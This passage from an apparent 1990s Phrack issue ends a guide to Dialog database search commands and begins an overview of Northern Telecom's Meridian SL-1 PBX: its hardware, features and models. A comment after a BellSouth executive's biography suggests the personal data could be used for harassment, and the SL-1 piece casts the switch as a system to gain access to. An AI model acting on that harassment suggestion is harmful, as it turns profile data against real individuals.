  13754.      MCGUIRE born 1933 married.  Graduate of Mississippi College 1957 and
  13755. University of Mississippi 1960.  1961-1965 law clerk of the U S Court of
  13756. Appeals, 5th Circuit and trial attorney for tax division at the Department
  13757. of Justice, Washington, DC and 1966 became Assistant U S Attorney, Northern
  13758. District of Mississippi.  1967 joined Southern Bell Telephone and Telegraph
  13759. Company (Inc), Atlanta, GA. Mar 1985 elected to present position.
  13760.  
  13761.  
  13762. Explanation of Bellsouth search results:
  13763. ----------------------------------------
  13764.  
  13765.     WOW! All they made in sales was 15 billion dollars -- and they call
  13766. hackers crooks.  The data showing the news is helpful, and all
  13767. the personal information could really be used for harassment purposes if
  13768. necessary.  Take a look at their credentials.  A prospective employee
  13769. could use this data to ass-kiss a little.  Their college references
  13770. clearly show why the E911 document created such a fiasco in the company....
  13771.  
  13772.  
  13773. <> - Searching and Search Strategy: Contrived and Free Text Searching
  13774. ---------------------------------------------------------------------
  13775.  
  13776.      There are two different types of searching to find the topic you
  13777. need: contrived and free text.  After selecting the "file" or database
  13778. number that you want, Dialog gives you a "?" as a prompt.  At this
  13779. point you can begin your searching.
  13780.  
  13781.      Contrived word searches should begin offline though.  The database
  13782. in question will send you a thesaurus (for a fee usually) which
  13783. will tell you exactly what words correlate with your topic, so that
  13784. you can go directly to the topic eliminating a lot of extra online
  13785. time.  Keep in mind that each database has a different thesaurus
  13786. so unless this database you have chosen is going to be your primary
  13787. database of use down the road, then you may want to just use free
  13788. text searching.
  13789.  
  13790.      The only problem with free text searching is if your word is
  13791. anywhere in an article it is counted and shown to you whether
  13792. relevant or not.  Imagine searching for the word "aircraft" in an
  13793. aeronautical database or "student" in an educational database.  The
  13794. result could be apocalyptic as you would have to sort the data by
  13795. its relevancy or irrelevancy.  That is why you need to develop what
  13796. is called a "search strategy".  Although Dialog permits you to expand
  13797. a too narrow search or condense a broad search, a perfect strategy will
  13798. not require the use of these commands (I will discuss them later though).
  13799. A perfect strategy is both effective, time efficient, and doesn't
  13800. generate too many headaches.
  13801.  
  13802.      The only things I feel that a search strategy needs to be considered
  13803. a good one is the correct use of the system's language (you need to know
  13804. exactly what you are typing in and why, just as with any other language -
  13805. Fortran, C, etc.) and a synonym dictionary.  Occasionally my mind will go
  13806. blank in searching through a database for a topic because once I have
  13807. input the primary topic, I run out of ideas with which to draw
  13808. correlations.  That is why you need the dictionary.  If I were searching
  13809. with the word "student", I could use the word "pupil" and "scholar" as
  13810. other points of venue to search with after I have looked up "student" in
  13811. the dictionary.  By using this technique, you are sort of using a
  13812. modification of the contrived word search as the costly thesaurus
  13813. does the same action as your two dollar synonym dictionary.
  13814.  
  13815. Beginning Your Search: The SELECT Command
  13816. -----------------------------------------
  13817.  
  13818.      After completing the login procedure, began the database that
  13819. you want to search, and viewed the welcome banner, etc. you will
  13820. be shown the following message:
  13821.  
  13822. Set  Items  Description
  13823. ---  -----  -----------
  13824.  
  13825. ?
  13826.  
  13827. This question mark tells you to start your search.  Functionally
  13828. the Select command will search through the database looking for the
  13829. terms that you have specified.  The correct way to do this is as
  13830. follows:
  13831.  
  13832. ? S [term]
  13833.  
  13834. ex.  ? S COMPUTER
  13835.  
  13836. Although very broad, the select command will search the entire database
  13837. for the word "Computer" and will compile a total list.  It will
  13838. display it to you as the following:
  13839.  
  13840. ? S COMPUTER
  13841.    S1 27263  COMPUTER
  13842.  
  13843. After each search the S# will increment itself by one.  What this
  13844. does is ease in the resurrection of searching.  If I ever wanted to
  13845. use the word "Computer" again, all I would have to type in is: "S1"
  13846. for an easy substitution.  Especially when I am using CD-ROM, I like
  13847. to use a very broad topic to begin my searching, and then I will narrow
  13848. it down.  The word "Computer" fits this description.
  13849.  
  13850. Adding meaning to the SELECTion
  13851. -------------------------------
  13852.  
  13853.      Here I would like to talk a little about the words "and" and
  13854. "or".  These words are definitely the most important words to search
  13855. with.  Specifically they will narrow down your search because you
  13856. are using one more word to help you find and article.
  13857.  
  13858. ex.  ? S COMPUTER AND CRIME             or          S S1 AND CRIME
  13859.         27263  S1
  13860.         356    CRIME
  13861.  
  13862.         S2  49 S1 AND CRIME
  13863.  
  13864. Notice how "CRIME" had 356 articles that contained its word, however
  13865. when combined with the word "Computer" only had 49!  This makes it
  13866. very easy to narrow your search down to specifics, but not all the way
  13867. as I will further explain.
  13868.  
  13869.      Another command I would like to discuss is the "SS" command.
  13870. This is an abbreviation of the Select command known as "Select Steps".
  13871. What this does is break up a search into individual steps.
  13872.  
  13873. ex.   ? SS COMPUTER AND CRIME
  13874.           S4  27263  COMPUTER
  13875.           S5    356  CRIME
  13876.           S6     49  COMPUTER AND CRIME
  13877.  
  13878. This is specifically used if I want to individualize a search and
  13879. use the terms for other topics.  Keep in mind that the assigning of
  13880. these steps and the individual searches that it must conduct may
  13881. result in slower processing times thereby running up your total
  13882. online bill.
  13883.  
  13884.      When Dialog is asked to do a search, it retrieves the following
  13885. in what is called fields: Title, Abstract, Descriptors, and Identifiers.
  13886. The two most important fields are the descriptors and identifiers.
  13887. When scanning a database that has come up with fifteen sources the
  13888. easiest way to determine if these articles are worth keeping or
  13889. tossing into the circular file is through the descriptors and
  13890. identifiers.  The "Descriptor" will in two words or less explain the
  13891. entire article, which is why they are otherwise known as the controlled
  13892. vocabulary terms.  Identifiers, on the other hand, are the free language
  13893. terms.  These are the ones we can relate to on an easier plane.  You
  13894. can also search specifically for descriptors or identifiers as well as
  13895. a lot more terms by the following commands.
  13896.  
  13897. Ex.  S COMPUTER AND CRIME/DE
  13898.  
  13899. This will search for computer and will use crime as a descriptor.  /ID
  13900. works as well for identifiers.  Other suffixes can be used as according
  13901. to the following table:
  13902.  
  13903.                          Index Listing - Part 1
  13904.                                 Table 3
  13905.  
  13906. +--------------------------------------------------------------------------+
  13907. | Suffix |     Field Name     |     Indexing     |   Examples              |
  13908. |--------|--------------------|------------------|-------------------------|
  13909. |  /AB   |     Abstract       |      Word        | S COMPUTER AND CRIME/AB |
  13910. |        |                    |                  |                         |
  13911. |  /DE   |     Descriptor     |  Word and Phrase | S COMPUTER AND CRIME/DE |
  13912. |        |                    |                  |                         |
  13913. |  /ID   |     Identifier     |  Word and Phrase | S COMPUTER AND CRIME/ID |
  13914. |        |                    |                  |                         |
  13915. |  /TI   |     Title          |      Word        | S COMPUTER AND CRIME/TI |
  13916. +--------------------------------------------------------------------------+
  13917.  
  13918. Truncation
  13919. ----------
  13920.  
  13921.      Truncation permits you to search for different forms of a
  13922. search term.  On Dialog, the symbol is "?".  For instance, if I wanted
  13923. to search for a word and I didn't know its exact spelling, I would do
  13924. the following:
  13925.  
  13926. ex. [Searching for the word Capone or Capoan, but not quite sure]
  13927.  
  13928.      ?  S CAPO?
  13929.           S1 122753  CAPO?
  13930.  
  13931. This also can be used in several other ways.  For instance, plurality,
  13932. or maximum number of letters following a word.  Example:
  13933.  
  13934. ex.  ?  S CAPO??
  13935.  
  13936. This maximizes the word search at two letters past the "O".
  13937.  
  13938. ex.  ?  S CAPONE?
  13939.  
  13940. This finds the plurality in the word capone.
  13941.  
  13942. ex.  ?  S CAP?  ?
  13943.  
  13944. This finds the letters between the two question marks.
  13945.  
  13946.  
  13947. Proximity and Field Operators
  13948. -----------------------------
  13949.  
  13950.      Proximity operators specify the position of search terms in
  13951. relation to each other within a record or field.  If I wanted to search
  13952. for the words "Legion" and wanted to make sure that the word "Doom"
  13953. was within a certain area around it, I would use a proximity operator.
  13954. For instance:
  13955.  
  13956. ? S LEGION(3W)DOOM
  13957.        932   LEGION
  13958.        812   DOOM
  13959.         27   LEGION(3W)DOOM
  13960.  
  13961. In the above example Doom was searched within three words of Legion.
  13962. You can use any number in place of the three.  The good thing about
  13963. this proximity operator is that it searches the second word from the
  13964. first on both sides.  Using the above example here is a picture of it:
  13965.  
  13966.          Doom <---- 3 words ----> Legion <---- 3 words ----> Doom
  13967.  
  13968.      A field operator allows two words to be within a field in any
  13969. order.  For example:
  13970.  
  13971. ? S COMPUTER(F)CRIME/DE
  13972.        14321  COMPUTER/DE
  13973.         2720  CRIME/DE
  13974.           95  COMPUTER(F)CRIME/DE
  13975.  
  13976. This shows that in the descriptor section of a search, the words
  13977. computer and crime show up ninety-five times together.  They could be
  13978. completely unrelated, although this is doubtful.
  13979.  
  13980.      The L operator is used exclusively for the descriptor section.
  13981. This operator simply "links" the words together.  A search term looks
  13982. like this:
  13983.  
  13984. ? S COMPUTER(L)CRIME
  13985.  
  13986.      The N operator is used similar to the W operator in that it
  13987. searches for a proximity of one word from another.  Here is an example
  13988. of a search:
  13989.  
  13990. ? S COMPUTER(5N)CRIME
  13991.  
  13992. This searches for the words computer and crime within five words
  13993. of each other.  Another way the N is used is to search with words
  13994. that are the same, for instance the words: air-to-air, or
  13995. protein(N)protein.  The below example when using the "N" operator
  13996. shows in the text just why the file would be flagged by the search
  13997. program.  Notice the "protein/protein".
  13998.  
  13999. ? S PROTEIN(N)PROTEIN
  14000.  
  14001. ... surfaces presumably as a result of dynamic process of protein
  14002. adsorption and desorption and protein / protein interaction.
  14003.  
  14004. Sample Record
  14005. -------------
  14006.  
  14007.      In order for me to discuss critical points in a found record
  14008. I first need to show the record itself.  The following record was
  14009. searched in the ERIC database (File number 1 - - $.50 per minute and
  14010. $30.00 per hour).
  14011.  
  14012. -----------------------------------------------------------------------------
  14013.  
  14014.   EJ330267  JC504091
  14015.   Invitation to a Hacker.
  14016.   Archer, Chalmers, Jr.; Archer, A. J. Finch
  14017.   Community, Junior and Technical College Journal, v56 n4 p26-28 Feb-Mar
  14018.   1986
  14019.   Available From: UMI
  14020.   Language: English
  14021.   Document Type: JOURNAL ARTICLE (080)
  14022.   Journal Announcement: CIKMAY86
  14023.   Examines the susceptibility of computerized institutional records to
  14024. security violations by "hackers," wishing to access the systems.  Points
  14025. to practices that encourage security abuses and risk confidentiality.
  14026. Outlines procedures used by Northern Virginia Community College to protect
  14027. its computer system. (LAL)
  14028.   Descriptors: Community Colleges; *Computer Oriented Programs; *Computers;
  14029. Confidentiality; *Confidential Records; Two Year Colleges
  14030.   Identifiers: *Hackers; School Records
  14031.  
  14032. -----------------------------------------------------------------------------
  14033.  
  14034. Let us examine this search more closely.
  14035.  
  14036. EJ330267                : This is what is known as the Dialog Accession
  14037.                           Number.  All files contained in the Dialog system,
  14038.                           no matter what database has an accession number.
  14039.                           You can search for an article exactly by this.
  14040.                           Use the index AN=.  Example:
  14041.                           S AN=EJ330267  |  Will call up the above article.
  14042.  
  14043. Invitation to a Hacker  : This is the title, use /TI as the index for this.
  14044.  
  14045. Archer, Chalmers, Jr.   : This is the author, Use the index AU=.  Example:
  14046.                           S AU=ARCHER, CHALMERS, JR.
  14047.  
  14048. Community, Junior ...   : This is the location, the source of the
  14049.                           publication.  Use the index SO=.
  14050.  
  14051. English                 : This is the language.  Dialog lets you search
  14052.                           for articles in different languages.  Use the
  14053.                           index LA=.
  14054.  
  14055. CIJMAY86                : This is the Journal Announcement.  You can use
  14056.                           the index JA=
  14057.  
  14058. And you know the Abstract, descriptors and identifiers.  The following
  14059. table shows all the indexes including the ones above for convenience.
  14060.  
  14061.                          Index Listing - Part 2
  14062.                                 Table 4
  14063.  
  14064. +--------------------------------------------------------------------------+
  14065. | Prefix |                 Field Name                  |     Indexing      |
  14066. |--------|---------------------------------------------|-------------------|
  14067. | AN =   |  DIALOG Accession Number                    |      Phrase       |
  14068. | AU =   |  Author                                     |      Phrase       |
  14069. | BN =   |  International Standard Book Number (ISBN)  |      Phrase       |
  14070. | CD =   |  Conference Date                            |      Phrase       |
  14071. | CL =   |  Conference Location                        |      Word         |
  14072. | CS =   |  Corporate Source                           |      Word         |
  14073. | CT =   |  Conference Title                           |      Word         |
  14074. | CY =   |  Conference Year                            |      Phrase       |
  14075. | DT =   |  Document Type                              |      Phrase       |
  14076. | JA =   |  Journal Announcement                       |      Phrase       |
  14077. | JN =   |  Journal Name                               |      Phrase       |
  14078. | LA =   |  Language                                   |      Phrase       |
  14079. | PY =   |  Publication Year                           |      Phrase       |
  14080. | SN =   |  International Standard Serial Number (ISSN)|      Phrase       |
  14081. | SO =   |  Source Publication                         |      Word         |
  14082. | SP =   |  Conference Sponsor                         |      Word         |
  14083. | UD =   |  Update                                     |      Phrase       |
  14084. +--------------------------------------------------------------------------+
  14085.  
  14086. The TYPE Command
  14087. ----------------
  14088.  
  14089.      The TYPE command is used to display your search results.  Once you
  14090. "S" the topic, you can display it in eight different formats.  Each
  14091. format costs a different price and varies with each database.  It is
  14092. usually more to display a full record than abstracts though.  The
  14093. command is listed as follows:
  14094.  
  14095. T (or TYPE) set/format/range of records
  14096.  
  14097. ex. T s1/5/1-20
  14098.  
  14099. This will "type" the results found in s1, show the whole record
  14100. (format 5), and display the first twenty records.  The command can
  14101. also be used to directly display an accession number as displayed
  14102. in the following:
  14103.  
  14104. T (or TYPE) accession number/format
  14105.  
  14106. ex. T EJ330267/5
  14107.  
  14108. This will display the full record of the "Invitation to a Hacker"
  14109. (the sample record). Note that most Dialog databases contain citations and
  14110. sometimes abstracts of articles but NOT the full text of the article. There
  14111. are some databases that do contain the full text of articles but most don't.
  14112. The reason most people search these databases is to get a bibliography
  14113. of articles that have been written on their topic. After reviewing the
  14114. results of their search, they can decide which if any, of the articles
  14115. published that they want a copy of. Obtaining full text copies of
  14116. articles is referred to as 'Document Delivery' service. Sometimes you
  14117. will see that the newspaper, magazine, or journal that a specific article
  14118. you obtained a citation of is in your library and can just photocopy it
  14119. yourself. Other times, the journal may be in another library perhaps
  14120. hundreds of miles away, in which you can request it via ILL (Inter-Library
  14121. Loan). And if you have no clue where to find a copy of the source of
  14122. an article, you can ask Dialog or the individual database supplier to
  14123. get a copy for you, typically at a cost in upwards of $15.00 for an
  14124. article from 1 to 20 pages. Fifteen bucks is a bit steep for a 2 page
  14125. article, so be sure you really need it before ordering. Besides, most
  14126. articles don't contain as much info that the title or abstract implies
  14127. it does.
  14128.  
  14129.    If you need direct record access, with any options in the Dialog command
  14130. system, just input the accession number.  All eight formats are shown in the
  14131. following table.
  14132.  
  14133.                              Predefined Formats
  14134.                                   Table 5
  14135.  
  14136. +--------------------------------------------------------------------------+
  14137. |          Format Number             |            Record Content           |
  14138. |------------------------------------|-------------------------------------|
  14139. |               1                    |  DIALOG Accession Number            |
  14140. |               2                    |  Full Record except Abstract        |
  14141. |               3                    |  Bibliographic Citation             |
  14142. |               4                    |  Full Record with Tagged Fields     |
  14143. |               5                    |  Full Record                        |
  14144. |               6                    |  Title and DIALOG Accession Number  |
  14145. |               7                    |  Full Record except Indexing        |
  14146. |               8                    |  Title and Indexing                 |
  14147. +--------------------------------------------------------------------------+
  14148.  
  14149. User Defined Format Options
  14150. ---------------------------
  14151.  
  14152.      If you are not satisfied with the eight formats, you can
  14153. modify the output to display exactly what you want.  The command
  14154. would look like the following:
  14155.  
  14156. ex. TYPE S3/AU,TI/1-5
  14157.  
  14158. This would exclusively show the author and the title in records
  14159. one through five.
  14160.  
  14161. The EXPAND Command
  14162. ------------------
  14163.  
  14164.      The EXPAND command allows you to look through the database
  14165. like looking through a dictionary.  The command would look like this:
  14166.  
  14167. ex.         ? E AU=CAPONE, F
  14168.            Ref  Items  Index-term
  14169.            E1       4  AU=CAPONE, A
  14170.            E2      10  AU=CAPONE, B
  14171.            E3      55  AU=CAPONE, C
  14172.            E4       8  AU=CAPONE, D
  14173.            E5       4  AU=CAPONE, E
  14174.            E6       2  AU=CAPONE, F
  14175.            E7      10  AU=CAPONE, FA
  14176.            E8     912  AU=CAPONE, FB
  14177.  
  14178. This is an especially useful term or name if you don't know exactly what
  14179. you are looking for.
  14180.  
  14181. Conclusion
  14182. ----------
  14183.  
  14184.      This file should give you an overview of the Dialog Information
  14185. System.  I exited the hacking world shortly after The Leftist, The
  14186. Urvile/Necron 99, and The Prophet were arrested in Operation Sundevil,
  14187. and Digital Logic's Data Service went down permanently along with my
  14188. sysop access.  It wasn't until a few years later did I reenter the
  14189. computer world to find a whole lot of things to have changed
  14190. including my hacker ethic.  I felt writing this file would be a
  14191. natural progression from my original hacking talents to "hacking" on
  14192. a legal basis.
  14193.  
  14194.      I would like to thank Erik Bloodaxe (for encouragement and
  14195. project ideas) and Lex Luthor (for more project ideas and editing).
  14196. If you have any questions or comments my Internet address is:
  14197. alcapone@mindvox.phantom.com.  On IRC, I am usually on either
  14198. #mindvox or #hack so look me up and say "Hey!".
  14199.  
  14200.                               ==Phrack Magazine==
  14201.  
  14202.                  Volume Four, Issue Forty-Four, File 19 of 27
  14203.  
  14204. ****************************************************************************
  14205.  
  14206.                       Northern Telecom Meridian SL-1
  14207.  
  14208.                                 by Iceman
  14209.  
  14210.                                Introduction
  14211.                                ~~~~~~~~~~~~
  14212.  
  14213.  This article is the first in a possible series devoted to Northern
  14214. Telecom's line of Meridian SL-1 switches. At the moment, I'm unsure if there
  14215. will even be a second article, since it would consist completely of the
  14216. programming of these switches, and it's not difficult for me, or anyone else
  14217. to type up a manual. If you haven't heard of an SL-1 before, to put things
  14218. simply, if you have ever called a Meridian Voice Mail system, this is the
  14219. computer that runs the show! Not all SL-1's have Voice Mail features, but
  14220. it makes things easier (for the electronic adventurer) if you have one that
  14221. does. Now it's far more than a simple voice mail system, it's a complete
  14222. phone switch, a PBX. Of course, like most computers, if you can gain access
  14223. to it, the system is at your beckon call, to do what you make it do. What
  14224. follows is a brief history, and technical overview of the SL-1 series, as
  14225. well as information on identifying them. If this looks familiar, a large
  14226. portion of this article appeared my own magazine, Freedom, but was updated
  14227. for Phrack. If you had read the issue relating to SL-1's, you will also
  14228. find basic programming information for some of the more commonly used
  14229. overlay programs, it was purposely omitted in this article.
  14230.  
  14231.    History and Technical Overview
  14232.    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14233.  
  14234.  Development of Northern Electric's SL-1 started in 1971. Their
  14235. objective was to design a superior communications system for business
  14236. subscribers in the range of 100 to 7600 stations. The system had to encompass
  14237. all the features of a PBX, Centrex and key systems and be economically
  14238. competitive with them. It had to have new custom services not previously
  14239. feasible with the older systems. It had to be easy to learn and to operate.
  14240. As well, it had to be easy to install and maintain.
  14241.  
  14242.  What the designers came up with was a digital, stored program control
  14243. machine using an 8-bit PCM. They also came up with a new telephone instrument,
  14244. the SL-1 telephone, which is a multi-line instrument with many features, but
  14245. uses only 2 pairs of wires, instead of 25 pairs required by key telephones.
  14246.  
  14247.  The SL-1 system has three main parts: The common equipment (CE), the
  14248. peripheral equipment (PE) and the power supplies.
  14249.  
  14250.  The CE performs the central control and switching functions for all
  14251. the connecting lines and trunks. It has a central processing unit (CPU) and
  14252. read/write memory which stores all the operating programs and data unique
  14253. to the particular system, including switching sequences, feature and class
  14254. of service information, and numbers and types of terminals. Various models
  14255. use various media to store information, ranging from magnetic tape drives
  14256. to disk drives, for high-speed loading of the operating programs and data
  14257. into the read/write memory, and providing data restoration after a power
  14258. failure.  This media also contains the diagnostic routines, and all software
  14259. needed to program the switch. There is a Teletype to communicate to the system
  14260. with and to print error messages on. The network circuits perform the switching
  14261. duties for all lines and trunks. The digital service circuits provide for such
  14262. functions as dial and ringing tones and call conferencing.
  14263.  
  14264.  The CE units communicate over a common central bus under control of
  14265. the CPU. Speech signals, converted to digital, follow a separate path on a
  14266. network switching bus.
  14267.  
  14268.  The PE performs the interface between the line and trunk circuits and
  14269. the SL-1 system. It consists mainly of line and trunk cards which convert
  14270. analog speech to digital signals for digital switching and vice-versa. Lines
  14271. connect to individual instruments and trunks to other PBX's. Peripheral
  14272. buffers act as interface between the PE and the CE providing power control,
  14273. timing and switching control signals for the line and trunk circuits. Digital
  14274. conversion into 8-bit PCM is done by a single encoder/decoder (codec) for each
  14275. line or trunk. This codec is a custom LSI circuit.
  14276.  
  14277.  Between the PE and the CE, all signals travel in digital format on
  14278. time multiplexed loops. Each loops carriers 30 voice channels, one control
  14279. signalling channel and one unused channel. The channels operate at 64 kbps
  14280. to give a total data rate of 2.048 mbps. Each loops terminates on a different
  14281. circuit pack in the CE. There can be up to 16 multiplex loops.
  14282.  
  14283.  When a call is set up, the CPU assigns each party a channel from among
  14284. the 30 on their own multiplex loops. These channels form a matched pair. For
  14285. instance, the calling party may use channel 2 of it's digital loop, and the
  14286. called party may use channel 3 of it's loop.
  14287.  
  14288.  The SL-1 conducts audio digitally. The line and trunk cards contain
  14289. A/D and D/A converters. Received audio is changed to a digital signal and
  14290. put on a voice channel. At it's destination, the digital signal is converted
  14291. back to analog audio.
  14292.  
  14293.  All programming is done from a keyboard with the output going to a
  14294. printer. To program, a specific diagnostic program, called an overlay, is
  14295. selected, and is automatically loaded from tape or disk. Once this is done,
  14296. the appropriate commands are entered to change the options. All inputs, and
  14297. SL-1 responses are echoed on a printer or echoed out of the specified port.
  14298. If any system parameters or configurations are changed, these changes will
  14299. not survive a total power outage unless a new tape or disk is made.
  14300.  
  14301.  In case of a power outage, upon restoration of power, the SL-1 activates
  14302. the tape or disk unit and loads in the system operating data, and runs some
  14303. diagnostics. This takes from 5-15 minutes, and at the end of that time,
  14304. service is fully restored with all the options which were recorded on the tape
  14305. or disk being implemented. Of course any user-selected options like speed
  14306. call lists and call waiting which had been selected before the outage will
  14307. be lost.
  14308.  
  14309.  Automatic diagnostics (called 'background' programs) are being run
  14310. constantly with the results of any problems being echoed to output. At
  14311. midnight a more thorough set of diagnostics are run. Any of the diagnostics
  14312. may be run on demand from the keyboard. Also available on demand from the
  14313. keyboard are a series of diagnostics to determine the status of lines and
  14314. trunks, to trace calls, and to print lists and traffic studies.
  14315.  
  14316.      SL-1 Features
  14317.      ~~~~~~~~~~~~~
  14318.  
  14319.  - Call Waiting                     - Digitone (DTMF) service
  14320.  - Ring Again                       - Direct inward dialing
  14321.  - Display services                 - Direct outward dialing
  14322.  - Tandem switching                 - Private line service
  14323.  - Special dial tone                - Remote administration and
  14324.  - Traffic measurement                maintenance
  14325.  - Common control switching         - Multi-customer group operation
  14326.    arrangement access               - Line/trunk lockout
  14327.  - Data transmission                - Flexible numbering system
  14328.  - Access to automatic recorded       (2 to 4 digits)
  14329.    answering equipment              - Pulse to DTMF conversion
  14330.  - Access to paging equipment       - DTMF to pulse conversion
  14331.  - Call forward - busy              - Emergency transfer
  14332.  - Call forward - don't answer      - Hunting
  14333.  - Call forward - follow me         - Intercept
  14334.  - Call pickup                      - Manual service
  14335.  - Conference (3 or 6 party)        - Night service
  14336.  - Service restrictions
  14337.  
  14338.      SL-1 Telephone Set Features
  14339.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14340.  
  14341.  - Autodial                         - Automatic preselection
  14342.  - Call status                      - Headset connection
  14343.  - Call forwarding                  - Executive override
  14344.  - Call transfer                    - Hold
  14345.  - Speed calling                    - On-hook dialing
  14346.  - Call waiting                     - LED indicators
  14347.  - Tone ringing                     - Call pickup
  14348.  - Common audible signalling        - Loudspeaker/Amplifier
  14349.  - Ring again                       - Voice calling
  14350.  - Hands free operation             - Manual signalling
  14351.  - Multiple appearance directory    - 3 or 6 party conference
  14352.    number; multiple call            - non-locking keys
  14353.    arrangements                     - Single appearance directory
  14354.  - Prime directory number             number
  14355.  - Station set expansion            - Privacy
  14356.  - Privacy release
  14357.  
  14358.  
  14359.    Explanation of Some Features
  14360.    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14361.  
  14362. Station to station calling - Any station can directly call any other station
  14363. without attendant assistance.
  14364.  
  14365. Direct Outward Dialing (DOD) - Allows a station to gain access to the exchange
  14366. network without attendant assistance and receives a second dialtone.
  14367.  
  14368. Hunting - Routes a call to an idle station directory number when the called
  14369. number is busy. The numbers in the hunt group do not have to be in sequence
  14370. nor do they have to appear on the same instrument. The sequence can be
  14371. consecutive (station directory numbers are hunted in ascending numerical
  14372. order) or non-consecutive.
  14373.  
  14374. Access to paging - Provides a connection to customer-owned paging equipment.
  14375.  
  14376. Access to Automatic Recorded Answering Equipment - SL-1 stations can have
  14377. incoming messages recorded on customer-provided answering equipment by
  14378. forwarding calls to the directory number (DN) assigned to the equipment.
  14379.  
  14380. Direct Inward Dialing (DID) - Allows an incoming call from the exchange
  14381. network to reach a station without attendant assistance. The DN for each
  14382. station will normally be the last 2,3 or 4 digits of the 7 digit exchange
  14383. network number.
  14384.  
  14385. Tandem Switching - The SL-1 can act as an intermediate switching point for
  14386. traffic between other PBX's.
  14387.  
  14388. Manual Service - Does not provide a dialtone when a station goes off-hook.
  14389. Instead the attendant is alerted and completes the call for the user.
  14390.  
  14391. Private Line Service - Permits the appearance of a private central office line
  14392. on an SL-1 Telephone set. Dialtone is received directly from the telco and
  14393. calls are not processed by the SL-1.
  14394.  
  14395. Multi-Customer Group Operation - Allows for the provision of services for more
  14396. than one business customer from the same switching machine. Each customer
  14397. is totally separate from the others, may have the same directory numbers as
  14398. the others, has his own attendant console, his own trunks, and cannot directly
  14399. call stations belonging to the other customers.
  14400.  
  14401. Service Restrictions - Allows the ability to restrict various functions.
  14402.  
  14403. Intercept - Disposes of calls which cannot be completed because of
  14404. restrictions or dialing errors. They are either routed to the attendant
  14405. or overflow tone.
  14406.  
  14407. Special Dial Tone - A Regular dialtone with three 128 ms interruptions at the
  14408. beginning to advise the user that his hookswitch flash has been successful.
  14409.  
  14410. Line Lockout - Disconnects stations which have been off-hook for too long to
  14411. prevent system problems.
  14412.  
  14413. Night Service - Allows the attendant to preconnect some or all of the incoming
  14414. telco trunks to selected DN's on the SL-1.
  14415.  
  14416. Emergency Transfer - Puts the system in the power fail transfer mode. This
  14417. transfers telco trunks to selected stations to provide some continuity of
  14418. service to the outside world during the time the SL-1 is inoperative.
  14419.  
  14420. Remote Administration and Maintenance - Permits operation of the diagnostics
  14421. from a remote location via a modem and telephone line. You may do anything
  14422. from the remote terminal that you can do from the local terminal.
  14423.  
  14424. Call Forward - Busy - Routes incoming calls to another number when the called
  14425. station is busy.
  14426.  
  14427. Call Forward - Don't answer - Routes incoming calls to another number when the
  14428. called station doesn't answer within a prescribed time.
  14429.  
  14430. Call Forward - Follow me - Routes incoming calls to another, programmable
  14431. number.
  14432.  
  14433. Call Waiting - Informs the user of a second incoming call while he is already
  14434. in conversation. He can then place the first caller on hold and answer the
  14435. second call. He can then return to the first call.
  14436.  
  14437. Conference - Allows a user to connect up to either 1 or 4 additional persons
  14438. into an existing call. Up to 2 of the users may be trunks.
  14439.  
  14440. Call Pickup - Allows a station to answer an incoming call to another station
  14441. in the same pickup group by dialing a special code.
  14442.  
  14443. Ring Again - Permits a calling station, on encountering a busy DN, to operate
  14444. a dedicated key or dial a special code to have the system monitor the called
  14445. station and alert him when it goes idle. He is then automatically connect to
  14446. that station when he goes off-hook or presses the key during the alert and the
  14447. system rings that station.
  14448.  
  14449. Data Transmission - The SL-1 is suitable for voiceband data transmissions
  14450. and is compatible with a conventional modem.
  14451.  
  14452.  
  14453.      SL-1 Models
  14454.      ~~~~~~~~~~~
  14455.  
  14456. Model    Lines     Introduced    Generic      Features
  14457. ~~~~~    ~~~~~     ~~~~~~~~~~    ~~~~~~~      ~~~~~~~~
  14458. SL1-L    300-700      1975         x01      - N/A
  14459.  
  14460. SL1-VL   700-2500     1976         x02      - Multi customer operation
  14461.          - Automatic Identification of
  14462.            outward dialing
  14463.          - Do not disturb
  14464.  
  14465. CDR      N/A          1977       x03,x04,   - Call detail recording
  14466.      x08 - Recorded Announcement
  14467.          - Digit display console
  14468.  
  14469. SL1-LE   300-700      1978         x05      - Automatic Route Selection
  14470.  
  14471. SL1-VLE  700-2500      N/A         N/A      - Remote peripheral equipment
  14472.          - Automatic Number Identification
  14473.          - "E" system
  14474.          - Autovon
  14475.  
  14476. SL1-A    60-400       1979       x06,x07,   - Centralized attendant service
  14477.      x14        - Automatic call distribution
  14478.          - Digit display SL-1 Sets
  14479.          - 2500 Set Features
  14480.          - Direct inward system access
  14481.          - Dial Intercom
  14482.          - Message Center
  14483.          - Hotel/Motel
  14484.          - International Phase 1
  14485.  
  14486. SL1-XL   1000-5000    1980       x09,X17    - Advanced ACD packages
  14487.          - Multiple message center
  14488.          - Integrated voice and data
  14489.            switching
  14490.          - Hospital/Clinic
  14491.          - International Phase 2
  14492.  
  14493. ESN      N/A          1981       x9000      - Office data administration
  14494.            system
  14495.          - Automatic Wake-up
  14496.          - Room status
  14497.          - Auxiliary data system
  14498.          - Electronic switched network
  14499.          - International Phase 3
  14500.  
  14501. SL1-M    60-400       1982       x11 rls 1  - Attendant Administration
  14502.          - Attendant overflow
  14503.          - Automatic set relocation
  14504.          - History file
  14505.          - Call park
  14506.          - Flexible code restriction
  14507.          - System speed call
  14508.          - International Phase 4&5
  14509.  
  14510. SL1-S    30-160       1983       x11 rls 4  - Distinctive ringing
  14511.          - Stored number redial
  14512.          - Async. interface module
  14513.          - Sync. data transmission
  14514.          - Multi-channel data system
  14515.          - SL-1 displayphone
  14516.          - Hotel/Motel
  14517.  
  14518.  
  14519. 'Generic' refers to the software version. It is expressed as a 3 or 4 digit
  14520. number where the first part of the number indicates the machine it is for
  14521. and the second part indicates the purpose of the software and serves as a
  14522. version number and also indicates the type of machine it can be used with. The
  14523. 'X' stands for a 1 or 2 digit number representing the model:
  14524.  
  14525. 1 = SL1-L     2 = SL1-VL     3 = SL1-LE     4 = SL1-VLE     5 = SL1-A
  14526. 6 = SL1-XL    7 = SL1-M/S    8 = SL1-N      9 = SL1-XN      10= SL1-ST
  14527. 11= SL1-NT    12= SL1-XT
  14528.  
  14529.         Maintenance Programs
  14530.         ~~~~~~~~~~~~~~~~~~~~
  14531.  
  14532.  All troubleshooting procedures, configuration changes and circuit
  14533. disabling/enabling are carried out from the keyboard of a Teletype via
  14534. software programs. There is virtually no physical contact with the exchange
  14535. other than required to remove a defective board and replace it with a spare.
  14536. Even this does not require tools.
  14537.  
